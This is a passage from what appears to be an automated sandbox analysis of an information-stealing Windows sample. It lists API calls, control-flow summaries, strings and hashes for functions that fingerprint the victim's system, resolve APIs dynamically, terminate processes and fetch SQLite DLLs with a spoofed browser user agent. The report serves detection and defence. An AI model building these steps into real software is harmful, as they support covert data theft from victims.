                                                                                                                                                                                                                              • Part of subcall function 00410C5A: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00401385), ref: 00410C66
                                                                                                                                                                                                                              • Part of subcall function 00410C5A: HeapAlloc.KERNEL32(00000000,?,?,?,00401385), ref: 00410C6D
                                                                                                                                                                                                                              • Part of subcall function 00410C5A: GetComputerNameA.KERNEL32(00000000,00401385), ref: 00410C81
                                                                                                                                                                                                                              • Part of subcall function 00410C28: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,004013B9), ref: 00410C34
                                                                                                                                                                                                                              • Part of subcall function 00410C28: HeapAlloc.KERNEL32(00000000,?,?,?,004013B9), ref: 00410C3B
                                                                                                                                                                                                                              • Part of subcall function 00410C28: GetUserNameA.ADVAPI32(00000000,004013B9), ref: 00410C4F
                                                                                                                                                                                                                              • Part of subcall function 00411538: CreateDCA.GDI32(00000000,00000000,00000000,00000000), ref: 0041154A
                                                                                                                                                                                                                              • Part of subcall function 00411538: GetDeviceCaps.GDI32(00000000,00000008), ref: 00411555
                                                                                                                                                                                                                              • Part of subcall function 00411538: GetDeviceCaps.GDI32(00000000,0000000A), ref: 00411560
                                                                                                                                                                                                                              • Part of subcall function 00411538: ReleaseDC.USER32(00000000,00000000), ref: 0041156B
                                                                                                                                                                                                                              • Part of subcall function 00411538: GetProcessHeap.KERNEL32(00000000,00000104,?,?,004140D8,?,Display Resolution: ,004368FC,00000000,User Name: ,004368EC,00000000,Computer Name: ,004368D8,AV: ,004368CC), ref: 00411577
                                                                                                                                                                                                                              • Part of subcall function 00411538: HeapAlloc.KERNEL32(00000000,?,?,004140D8,?,Display Resolution: ,004368FC,00000000,User Name: ,004368EC,00000000,Computer Name: ,004368D8,AV: ,004368CC,Install Date: ), ref: 0041157E
                                                                                                                                                                                                                              • Part of subcall function 00411538: wsprintfA.USER32 ref: 00411590
                                                                                                                                                                                                                              • Part of subcall function 00410DB0: GetKeyboardLayoutList.USER32(00000000,00000000,0043670A,?,?), ref: 00410DE1
                                                                                                                                                                                                                              • Part of subcall function 00410DB0: LocalAlloc.KERNEL32(00000040,00000000), ref: 00410DEF
                                                                                                                                                                                                                              • Part of subcall function 00410DB0: GetKeyboardLayoutList.USER32(00000000,00000000), ref: 00410DFD
                                                                                                                                                                                                                              • Part of subcall function 00410DB0: GetLocaleInfoA.KERNEL32(?,00000002,?,00000200,00000000), ref: 00410E2C
                                                                                                                                                                                                                              • Part of subcall function 00410DB0: LocalFree.KERNEL32(00000000), ref: 00410ED4
                                                                                                                                                                                                                              • Part of subcall function 00410D03: GetProcessHeap.KERNEL32(00000000,00000104,?), ref: 00410D1E
                                                                                                                                                                                                                              • Part of subcall function 00410D03: HeapAlloc.KERNEL32(00000000), ref: 00410D25
                                                                                                                                                                                                                              • Part of subcall function 00410D03: GetTimeZoneInformation.KERNEL32(?), ref: 00410D34
                                                                                                                                                                                                                              • Part of subcall function 00410D03: wsprintfA.USER32 ref: 00410D52
                                                                                                                                                                                                                              • Part of subcall function 00410F26: GetProcessHeap.KERNEL32(00000000,00000104,00000000,?,?,?,00414292,Processor: ,[Hardware],00436958,00000000,TimeZone: ,00436948,00000000,Local Time: ,00436934), ref: 00410F3A
                                                                                                                                                                                                                              • Part of subcall function 00410F26: HeapAlloc.KERNEL32(00000000,?,?,?,00414292,Processor: ,[Hardware],00436958,00000000,TimeZone: ,00436948,00000000,Local Time: ,00436934,Keyboard Languages: ,00436918), ref: 00410F41
                                                                                                                                                                                                                              • Part of subcall function 00410F26: RegOpenKeyExA.KERNEL32(80000002,00000000,00020119,00436890,?,?,?,00414292,Processor: ,[Hardware],00436958,00000000,TimeZone: ,00436948,00000000,Local Time: ), ref: 00410F5F
                                                                                                                                                                                                                              • Part of subcall function 00410F26: RegQueryValueExA.KERNEL32(00436890,00000000,00000000,00000000,000000FF,?,?,?,00414292,Processor: ,[Hardware],00436958,00000000,TimeZone: ,00436948,00000000), ref: 00410F7B
                                                                                                                                                                                                                              • Part of subcall function 00410F26: RegCloseKey.ADVAPI32(00436890,?,?,?,00414292,Processor: ,[Hardware],00436958,00000000,TimeZone: ,00436948,00000000,Local Time: ,00436934,Keyboard Languages: ,00436918), ref: 00410F84
                                                                                                                                                                                                                              • Part of subcall function 00410FDC: GetLogicalProcessorInformationEx.KERNELBASE(0000FFFF,00000000,?), ref: 00411052
                                                                                                                                                                                                                              • Part of subcall function 00410FDC: wsprintfA.USER32 ref: 004110B0
                                                                                                                                                                                                                              • Part of subcall function 00410F8F: GetSystemInfo.KERNEL32(?), ref: 00410FA9
                                                                                                                                                                                                                              • Part of subcall function 00410F8F: wsprintfA.USER32 ref: 00410FC1
                                                                                                                                                                                                                              • Part of subcall function 004110EE: GetProcessHeap.KERNEL32(00000000,00000104,?,Keyboard Languages: ,00436918,Display Resolution: ,004368FC,00000000,User Name: ,004368EC,00000000,Computer Name: ,004368D8,AV: ,004368CC,Install Date: ), ref: 00411106
                                                                                                                                                                                                                              • Part of subcall function 004110EE: HeapAlloc.KERNEL32(00000000), ref: 0041110D
                                                                                                                                                                                                                              • Part of subcall function 004110EE: GlobalMemoryStatusEx.KERNEL32(?,?,00000040), ref: 00411129
                                                                                                                                                                                                                              • Part of subcall function 004110EE: wsprintfA.USER32 ref: 0041114F
                                                                                                                                                                                                                              • Part of subcall function 00411167: EnumDisplayDevicesA.USER32(00000000,00000000,?,00000001), ref: 004111BE
                                                                                                                                                                                                                              • Part of subcall function 0041147A: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,0043670F,?,?), ref: 004114A9
                                                                                                                                                                                                                              • Part of subcall function 0041147A: Process32First.KERNEL32(00000000,00000128), ref: 004114B9
                                                                                                                                                                                                                              • Part of subcall function 0041147A: Process32Next.KERNEL32(00000000,00000128), ref: 00411517
                                                                                                                                                                                                                              • Part of subcall function 0041147A: CloseHandle.KERNEL32(00000000), ref: 00411522
                                                                                                                                                                                                                              • Part of subcall function 004111D8: RegOpenKeyExA.KERNEL32(?,00000000,00020019,?,0043670E,00000000,?,?), ref: 00411248
                                                                                                                                                                                                                              • Part of subcall function 004111D8: RegEnumKeyExA.KERNEL32(?,?,?,?,00000000,00000000,00000000,00000000), ref: 00411285
                                                                                                                                                                                                                              • Part of subcall function 004111D8: wsprintfA.USER32 ref: 004112B2
                                                                                                                                                                                                                              • Part of subcall function 004111D8: RegOpenKeyExA.KERNEL32(?,?,00000000,00020019,?), ref: 004112D1
                                                                                                                                                                                                                              • Part of subcall function 004111D8: RegQueryValueExA.KERNEL32(?,00000000,000F003F,?,?), ref: 00411307
                                                                                                                                                                                                                              • Part of subcall function 004111D8: lstrlenA.KERNEL32(?), ref: 0041131C
                                                                                                                                                                                                                              • Part of subcall function 004111D8: RegQueryValueExA.KERNEL32(?,00000000,000F003F,?,?,?,00436E94), ref: 004113B1
                                                                                                                                                                                                                              • Part of subcall function 004111D8: RegCloseKey.ADVAPI32(?), ref: 0041141B
                                                                                                                                                                                                                              • Part of subcall function 004111D8: RegCloseKey.ADVAPI32(?), ref: 00411447
                                                                                                                                                                                                                            • lstrlenA.KERNEL32(?,?,?,?,?,?,?,?,Keyboard Languages: ,00436918,Display Resolution: ,004368FC,00000000,User Name: ,004368EC,00000000), ref: 004145A3
                                                                                                                                                                                                                              • Part of subcall function 00416ED9: CreateThread.KERNEL32(00000000,00000000,00416E08,?,00000000,00000000), ref: 00416F78
                                                                                                                                                                                                                              • Part of subcall function 00416ED9: WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00416F80
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000002.00000002.2685053359.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Heap$Process$Alloc$wsprintf$Close$CreateOpen$InitializeQueryValuelstrcatlstrcpy$InformationLocalNamelstrlen$BlanketCapsCurrentDeviceEnumHandleInfoInitInstanceKeyboardLayoutListProcess32ProxySecurityTimeVariant_memset$CharComputerDevicesDirectoryDisplayFileFirstFreeGlobalH_prolog3_catchH_prolog3_catch_LocaleLogicalMemoryModuleNextObjectProcessorProfileReleaseSingleSnapshotStatusSystemThreadToolhelp32UserVolumeWaitWindowsZone
                                                                                                                                                                                                                            • String ID: 11.1$AV: $Computer Name: $Cores: $Date: $Display Resolution: $GUID: $HWID: $Install Date: $Keyboard Languages: $Local Time: $MachineID: $Path: $Processor: $RAM: $Threads: $TimeZone: $User Name: $Version: $VideoCard: $Windows: $Work Dir: In memory$[Hardware]$[Processes]$[Software]$information.txt
                                                                                                                                                                                                                            • API String ID: 23247351-3666103263
                                                                                                                                                                                                                            • Opcode ID: 88b065f9f5e0f9dd0764b3e8e2ca3d6c7e9e727a9f84fd169e9acdb434c263ee
                                                                                                                                                                                                                            • Instruction ID: 9fcf276b88ee362a1aefe5e387cf481d2dd0b88037fe18433872ea0f2fc6c02d
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 88b065f9f5e0f9dd0764b3e8e2ca3d6c7e9e727a9f84fd169e9acdb434c263ee
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0B526971D0001EABCF01FBA1DD429CDB775AF04748F51816AA511771A2DBB87ECA8F98
                                                                                                                                                                                                                            Function 00418685 Relevance: 48.2, APIs: 32, Instructions: 154libraryloaderCOMMON
                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                            control_flow_graph 1419 418685-418695 call 4185dc 1422 418886-4188e3 LoadLibraryA * 5 1419->1422 1423 41869b-418881 call 407d47 GetProcAddress * 20 1419->1423 1425 4188e5-4188f2 GetProcAddress 1422->1425 1426 4188f7-4188fe 1422->1426 1423->1422 1425->1426 1428 418900-418924 GetProcAddress * 2 1426->1428 1429 418929-418930 1426->1429 1428->1429 1430 418932-41893f GetProcAddress 1429->1430 1431 418944-41894b 1429->1431 1430->1431 1432 41894d-41895a GetProcAddress 1431->1432 1433 41895f-418966 1431->1433 1432->1433 1435 418991 1433->1435 1436 418968-41898c GetProcAddress * 2 1433->1436 1436->1435
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • GetProcAddress.KERNEL32 ref: 004186C6
                                                                                                                                                                                                                            • GetProcAddress.KERNEL32 ref: 004186DD
                                                                                                                                                                                                                            • GetProcAddress.KERNEL32 ref: 004186F4
                                                                                                                                                                                                                            • GetProcAddress.KERNEL32 ref: 0041870B
                                                                                                                                                                                                                            • GetProcAddress.KERNEL32 ref: 00418722
                                                                                                                                                                                                                            • GetProcAddress.KERNEL32 ref: 00418739
                                                                                                                                                                                                                            • GetProcAddress.KERNEL32 ref: 00418750
                                                                                                                                                                                                                            • GetProcAddress.KERNEL32 ref: 00418767
                                                                                                                                                                                                                            • GetProcAddress.KERNEL32 ref: 0041877E
                                                                                                                                                                                                                            • GetProcAddress.KERNEL32 ref: 00418795
                                                                                                                                                                                                                            • GetProcAddress.KERNEL32 ref: 004187AC
                                                                                                                                                                                                                            • GetProcAddress.KERNEL32 ref: 004187C3
                                                                                                                                                                                                                            • GetProcAddress.KERNEL32 ref: 004187DA
                                                                                                                                                                                                                            • GetProcAddress.KERNEL32 ref: 004187F1
                                                                                                                                                                                                                            • GetProcAddress.KERNEL32 ref: 00418808
                                                                                                                                                                                                                            • GetProcAddress.KERNEL32 ref: 0041881F
                                                                                                                                                                                                                            • GetProcAddress.KERNEL32 ref: 00418836
                                                                                                                                                                                                                            • GetProcAddress.KERNEL32 ref: 0041884D
                                                                                                                                                                                                                            • GetProcAddress.KERNEL32 ref: 00418864
                                                                                                                                                                                                                            • GetProcAddress.KERNEL32 ref: 0041887B
                                                                                                                                                                                                                            • LoadLibraryA.KERNEL32(?,00418504), ref: 0041888C
                                                                                                                                                                                                                            • LoadLibraryA.KERNEL32(?,00418504), ref: 0041889D
                                                                                                                                                                                                                            • LoadLibraryA.KERNEL32(?,00418504), ref: 004188AE
                                                                                                                                                                                                                            • LoadLibraryA.KERNEL32(?,00418504), ref: 004188BF
                                                                                                                                                                                                                            • LoadLibraryA.KERNEL32(?,00418504), ref: 004188D0
                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(75A70000,00418504), ref: 004188EC
                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(75290000,00418504), ref: 00418907
                                                                                                                                                                                                                            • GetProcAddress.KERNEL32 ref: 0041891E
                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(75BD0000,00418504), ref: 00418939
                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(75450000,00418504), ref: 00418954
                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(76E90000,00418504), ref: 0041896F
                                                                                                                                                                                                                            • GetProcAddress.KERNEL32 ref: 00418986
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000002.00000002.2685053359.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: AddressProc$LibraryLoad
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 2238633743-0
                                                                                                                                                                                                                            • Opcode ID: 2dbbfc929b8f993913bf6cc8f40ee179c9bfe20a2ea7c03f75fbc9e0dd5c09c8
                                                                                                                                                                                                                            • Instruction ID: e15db10cd0fdf5c8d7ae2cec0182c2fa1046cf6aaa80e190bc6e5928fe16da9b
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 2dbbfc929b8f993913bf6cc8f40ee179c9bfe20a2ea7c03f75fbc9e0dd5c09c8
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F1710975911322AFDF1ADFA0FD4A8243AABFB08203F11B526E91982274D7774B60DF15
                                                                                                                                                                                                                            Function 00408853 Relevance: 42.4, APIs: 23, Strings: 1, Instructions: 389memoryfilestringCOMMON
                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                            control_flow_graph 1774 408853-408870 call 41076a 1777 408872-408877 1774->1777 1778 408879-408889 call 41076a 1774->1778 1780 408890-408898 call 41051e 1777->1780 1783 40889a-4088aa call 41076a 1778->1783 1784 40888b 1778->1784 1786 4088b0-40892d call 4104bc call 411c1f call 4105de call 41059c call 4105de call 41059c call 410562 call 402920 * 5 1780->1786 1783->1786 1790 408d85-408da9 call 402920 * 3 call 401cde 1783->1790 1784->1780 1822 408944-408954 CopyFileA 1786->1822 1823 408956-40898f call 4104bc call 4105de call 410562 call 402920 1822->1823 1824 40892f-408941 call 4104ee call 412285 1822->1824 1837 408991-4089e2 call 4105de call 410562 call 402920 call 41059c call 410562 call 402920 call 4105de call 410562 1823->1837 1838 4089e7-408a66 call 4105de call 410562 call 402920 call 41059c call 410562 call 402920 call 4105de call 410562 call 402920 call 41059c call 4105de call 410562 call 402920 1823->1838 1824->1822 1871 408a6b-408a84 call 402920 1837->1871 1838->1871 1880 408a8a-408aa5 1871->1880 1881 408d5e-408d6a DeleteFileA call 402920 1871->1881 1888 408d4a-408d5d 1880->1888 1889 408aab-408ac1 GetProcessHeap RtlAllocateHeap 1880->1889 1886 408d6f-408d80 call 402920 * 3 1881->1886 1886->1790 1888->1881 1892 408ced-408cfa 1889->1892 1899 408d00-408d0c lstrlenA 1892->1899 1900 408ac6-408baa call 4104bc * 6 call 401cfd call 4104ee call 40826d StrCmpCA 1892->1900 1899->1888 1902 408d0e-408d3a call 401cfd lstrlenA call 4104ee call 416ed9 1899->1902 1936 408bb3-408bc6 StrCmpCA 1900->1936 1937 408bac 1900->1937 1913 408d3f-408d45 call 402920 1902->1913 1913->1888 1938 408bd0 1936->1938 1939 408bc8-408bce 1936->1939 1937->1936 1940 408bd6-408bee call 41051e StrCmpCA 1938->1940 1939->1940 1943 408bf0-408bf6 1940->1943 1944 408bf8 1940->1944 1945 408bfe-408c09 call 41051e 1943->1945 1944->1945 1948 408c18-408ce8 lstrcatA * 14 call 402920 * 7 1945->1948 1949 408c0b-408c13 call 41051e 1945->1949 1948->1892 1949->1948
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                              • Part of subcall function 0041076A: StrCmpCA.SHLWAPI(?,?,?,0040886E,?,?,?), ref: 00410773
                                                                                                                                                                                                                            • CopyFileA.KERNEL32(?,?,00000001), ref: 0040894C
                                                                                                                                                                                                                              • Part of subcall function 004104EE: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417663), ref: 0041050D
                                                                                                                                                                                                                              • Part of subcall function 00412285: _memset.LIBCMT ref: 004122AC
                                                                                                                                                                                                                              • Part of subcall function 00412285: OpenProcess.KERNEL32(00001001,00000000,?,00000000,?), ref: 00412352
                                                                                                                                                                                                                              • Part of subcall function 00412285: TerminateProcess.KERNEL32(00000000,00000000), ref: 00412360
                                                                                                                                                                                                                              • Part of subcall function 00412285: CloseHandle.KERNEL32(00000000), ref: 00412367
                                                                                                                                                                                                                              • Part of subcall function 004105DE: lstrlenA.KERNEL32(?,00000000,?,?,?,?,004170DE,00436C20,00000000,004366BA,?,?,?,?,004185D1), ref: 004105F2
                                                                                                                                                                                                                              • Part of subcall function 004105DE: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,004170DE,00436C20,00000000,004366BA,?,?,?,?,004185D1), ref: 0041061A
                                                                                                                                                                                                                              • Part of subcall function 004105DE: lstrcatA.KERNEL32(?,00000000,?,?,?,?,004170DE,00436C20,00000000,004366BA,?,?,?,?,004185D1), ref: 00410625
                                                                                                                                                                                                                              • Part of subcall function 00410562: lstrcpyA.KERNEL32(00000000,?,00000000,004170FC,00436C20,00000000,004366BA,?,?,?,?,004185D1), ref: 00410592
                                                                                                                                                                                                                              • Part of subcall function 0041059C: lstrcpyA.KERNEL32(00000000,?,0000000C,0041762B,004366D6), ref: 004105CA
                                                                                                                                                                                                                              • Part of subcall function 0041059C: lstrcatA.KERNEL32(?,?), ref: 004105D4
                                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,000F423F), ref: 00408AB1
                                                                                                                                                                                                                            • RtlAllocateHeap.NTDLL(00000000), ref: 00408AB8
                                                                                                                                                                                                                            • StrCmpCA.SHLWAPI(?,ERROR_V128), ref: 00408BA2
                                                                                                                                                                                                                            • StrCmpCA.SHLWAPI(?,004371E0), ref: 00408BBB
                                                                                                                                                                                                                            • StrCmpCA.SHLWAPI(?,004371E4), ref: 00408BE3
                                                                                                                                                                                                                            • lstrlenA.KERNEL32(?), ref: 00408D03
                                                                                                                                                                                                                            • lstrlenA.KERNEL32(?), ref: 00408D1E
                                                                                                                                                                                                                              • Part of subcall function 00416ED9: CreateThread.KERNEL32(00000000,00000000,00416E08,?,00000000,00000000), ref: 00416F78
                                                                                                                                                                                                                              • Part of subcall function 00416ED9: WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00416F80
                                                                                                                                                                                                                            • DeleteFileA.KERNEL32(?), ref: 00408D61
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000002.00000002.2685053359.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: lstrcpy$Processlstrlen$FileHeaplstrcat$AllocateCloseCopyCreateDeleteHandleObjectOpenSingleTerminateThreadWait_memset
                                                                                                                                                                                                                            • String ID: ERROR_V128
                                                                                                                                                                                                                            • API String ID: 2819533921-2537946777
                                                                                                                                                                                                                            • Opcode ID: 64d338df601a607161d18948afcba58f8b43687a0c28428ee845618edde27115
                                                                                                                                                                                                                            • Instruction ID: 37fb0b20975b4b4c7a561ed522e3b0a52bc35175d85a44b4c07a7eb0ad9001ad
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 64d338df601a607161d18948afcba58f8b43687a0c28428ee845618edde27115
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 14E12E72900209ABCF11FFA1ED469DD7B76AF04305F20502AF551B31A2DBB96E869F48
                                                                                                                                                                                                                            Function 004169F8 Relevance: 38.7, APIs: 8, Strings: 14, Instructions: 249sleepCOMMON
                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                              • Part of subcall function 0041051E: lstrlenA.KERNEL32(?,?,004171B6,004366BE,004366BB,?,?,?,?,004185D1), ref: 00410524
                                                                                                                                                                                                                              • Part of subcall function 0041051E: lstrcpyA.KERNEL32(00000000,00000000,?,004171B6,004366BE,004366BB,?,?,?,?,004185D1), ref: 00410556
                                                                                                                                                                                                                              • Part of subcall function 004104BC: lstrcpyA.KERNEL32(00000000,00000000,?,004170BD,004366BA,?,?,?,?,004185D1), ref: 004104E2
                                                                                                                                                                                                                              • Part of subcall function 00416908: StrCmpCA.SHLWAPI(?,ERROR), ref: 0041695C
                                                                                                                                                                                                                              • Part of subcall function 00416908: lstrlenA.KERNEL32(?), ref: 00416967
                                                                                                                                                                                                                              • Part of subcall function 00416908: StrStrA.SHLWAPI(00000000,?), ref: 0041697C
                                                                                                                                                                                                                              • Part of subcall function 00416908: lstrlenA.KERNEL32(?), ref: 0041698B
                                                                                                                                                                                                                              • Part of subcall function 00416908: lstrlenA.KERNEL32(00000000), ref: 004169A4
                                                                                                                                                                                                                              • Part of subcall function 00410562: lstrcpyA.KERNEL32(00000000,?,00000000,004170FC,00436C20,00000000,004366BA,?,?,?,?,004185D1), ref: 00410592
                                                                                                                                                                                                                            • StrCmpCA.SHLWAPI(?,ERROR), ref: 00416AE2
                                                                                                                                                                                                                            • StrCmpCA.SHLWAPI(?,ERROR), ref: 00416B3B
                                                                                                                                                                                                                            • StrCmpCA.SHLWAPI(?,ERROR), ref: 00416B9B
                                                                                                                                                                                                                            • StrCmpCA.SHLWAPI(?,ERROR), ref: 00416BF4
                                                                                                                                                                                                                            • StrCmpCA.SHLWAPI(?,ERROR), ref: 00416C0A
                                                                                                                                                                                                                            • StrCmpCA.SHLWAPI(?,ERROR), ref: 00416C20
                                                                                                                                                                                                                            • StrCmpCA.SHLWAPI(?,ERROR), ref: 00416C32
                                                                                                                                                                                                                            • Sleep.KERNEL32(0000EA60), ref: 00416C41
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000002.00000002.2685053359.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: lstrlen$lstrcpy$Sleep
                                                                                                                                                                                                                            • String ID: ERROR$ERROR$ERROR$ERROR$ERROR$ERROR$ERROR$Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0$Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0$pvA$sqlite3.dll$sqlite3.dll$sqlp.dll$sqlp.dll
                                                                                                                                                                                                                            • API String ID: 2840494320-2416438311
                                                                                                                                                                                                                            • Opcode ID: 5d47d3a7fc90dc90f05e4ded83c2600598b2ad355a675c98f79175fb2a130361
                                                                                                                                                                                                                            • Instruction ID: 809798b9d7f536d65c9f0d42a81ce9458fba830cc6cfafc1e851dda3864c9776
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 5d47d3a7fc90dc90f05e4ded83c2600598b2ad355a675c98f79175fb2a130361
